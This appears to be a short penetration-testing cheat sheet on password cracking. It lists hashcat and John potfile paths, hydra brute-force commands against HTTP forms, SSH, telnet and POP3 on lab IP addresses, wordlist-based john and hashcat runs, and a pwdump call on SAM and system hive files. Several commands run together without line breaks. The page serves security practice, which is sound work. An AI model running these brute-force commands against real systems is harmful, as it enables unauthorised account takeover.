Password Cracking
https://hashcat.net/wiki/doku.php?id=example_hashes
HASHCAT stores cracked passwords in:
/root/.hashcat/.hashcat.potfile
JOHN stores cracked passwords in:
/root/.john/john.pothydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.10.10.76 ssh -s 22022hydra -L users.txt -P pass.txt 192.168.1.181 sshhydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnethydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3john --wordlist=/usr/share/wordlists/rockyou.txt hashhashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --outfile=cracked.txtpwdump system.old sam.oldLast updated
Was this helpful?
